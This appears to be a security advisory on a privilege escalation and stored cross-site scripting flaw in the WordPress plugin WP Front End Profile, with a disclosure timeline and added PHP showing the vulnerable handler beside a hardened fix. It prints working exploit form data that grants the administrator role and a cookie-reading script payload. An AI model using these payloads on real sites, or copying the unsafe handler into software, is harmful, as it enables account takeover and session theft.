Source: wpexploit
Author: Phil Wylie
WPEX-ID: CB80F049-0433-44A0-9F9C-35A6E8DA820E
Published: Sep 14, 2016

WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)

2016-09-14 00:00:00
Phil Wylie
15

EPSS: 0.002 (percentile 60.7%)

It is possible to modify the POST request sent by the front-end profile form so that it overwrites arbitrary user meta, including 'wp_capabilities' and 'wp_user_level'. This results in a privilege escalation vulnerability: a logged-in user can grant themselves the administrator role. The form nonce does not prevent this, because the attacker is the legitimate submitter of their own profile form (note the valid wpfep_nonce_name value in the request data). User input is also not sanitised on input or escaped on output, resulting in a stored cross-site scripting (XSS) vulnerability.

Timeline:
2016-09-12: Vulnerability found
2016-09-12: Reported to vendor
2016-09-12: Vendor responded
2016-09-14: Vendor released a fixed version (0.2.2)
2016-09-14: Public disclosure

Privilege Escalation - Form data

profile[user_email]:[email protected]
profile[wp_capabilities][administrator]:1
profile[wp_user_level]:10
profile[user_url]:
profile[description]:
profile[wpfep_save]:Update Profile
wpfep_nonce_name:99fc626e77
_wp_http_referer:/sample-page/

Stored XSS - Form data

wpmark_tab[testing_field]:example"><script>alert(document.cookie)</script>
wpmark_tab[wpfep_save]:Update Testing
wpfep_nonce_name:02c01469d8
_wp_http_referer:/sample-page/
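The following is an added example, not code from WP Front End Profile or its author: a minimal handler that reproduces the unsafe pattern behind both requests above (every posted profile[] key written straight to user meta, values echoed back unescaped) next to a hardened version that only accepts an explicit allowlist of fields, sanitises each one, routes core user fields through wp_update_user(), and escapes on output. The function names, the nonce action string 'wpfep_save', and the field layout are assumptions chosen to match the form data on this page; only the WordPress core functions called (wp_verify_nonce, wp_unslash, wp_update_user, update_user_meta, get_user_meta, sanitize_email, is_email, esc_url_raw, sanitize_text_field, esc_attr) are real.

```php
<?php
// Added example (not the plugin's own code). Handler names and the 'wpfep_save'
// nonce action are hypothetical; the WordPress core functions are real.

// UNSAFE PATTERN: every profile[...] key in the request becomes a user meta key.
// Posting profile[wp_capabilities][administrator]=1 and profile[wp_user_level]=10
// turns the current user into an administrator. The nonce does not help here:
// the attacker is the legitimate submitter of their own profile form.
function wpfep_example_save_profile_unsafe() {
    if ( ! isset( $_POST['profile'], $_POST['wpfep_nonce_name'] )
        || ! wp_verify_nonce( $_POST['wpfep_nonce_name'], 'wpfep_save' ) ) {
        return;
    }
    $user_id = get_current_user_id();
    foreach ( (array) $_POST['profile'] as $key => $value ) {
        update_user_meta( $user_id, $key, $value ); // no allowlist, no sanitisation
    }
}

// HARDENED: only allowlisted fields are read from the request, each through its
// own sanitiser, and they are applied via wp_update_user(). Capability and level
// keys are unreachable no matter what the request contains.
function wpfep_example_save_profile_safe() {
    if ( ! is_user_logged_in() ) {
        return;
    }
    $nonce = isset( $_POST['wpfep_nonce_name'] ) ? $_POST['wpfep_nonce_name'] : '';
    if ( ! wp_verify_nonce( $nonce, 'wpfep_save' ) ) {
        wp_die( 'Invalid request.' );
    }
    $user_id = get_current_user_id();
    $input   = isset( $_POST['profile'] ) ? wp_unslash( (array) $_POST['profile'] ) : array();

    // Field => sanitiser. Anything not listed here is silently dropped.
    $allowed = array(
        'user_email'  => 'sanitize_email',
        'user_url'    => 'esc_url_raw',
        'description' => 'sanitize_text_field',
    );

    $userdata = array( 'ID' => $user_id );
    foreach ( $allowed as $key => $sanitize ) {
        // Reject non-scalar values: profile[wp_capabilities][administrator]=1
        // arrives as an array, and arrays are never valid for these fields.
        if ( ! isset( $input[ $key ] ) || ! is_string( $input[ $key ] ) ) {
            continue;
        }
        $userdata[ $key ] = call_user_func( $sanitize, $input[ $key ] );
    }
    if ( isset( $userdata['user_email'] ) && ! is_email( $userdata['user_email'] ) ) {
        unset( $userdata['user_email'] );
    }

    $result = wp_update_user( $userdata );
    if ( is_wp_error( $result ) ) {
        wp_die( esc_html( $result->get_error_message() ) );
    }
}

// STORED XSS FIX: escape at the point of output. esc_attr() neutralises the
// "><script>...</script> payload from the second request even if an
// unsanitised value is already sitting in the database from before the fix.
function wpfep_example_render_field( $user_id, $key ) {
    $value = get_user_meta( $user_id, $key, true );
    return sprintf(
        '<input type="text" name="wpmark_tab[%s]" value="%s">',
        esc_attr( $key ),
        esc_attr( $value )
    );
}
```

The two defences are independent: the allowlist closes the privilege escalation regardless of how values are escaped, and escaping on output closes the XSS regardless of what was accepted on input. Sanitising on input alone is not a substitute for the second, since data can reach user meta through other paths.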
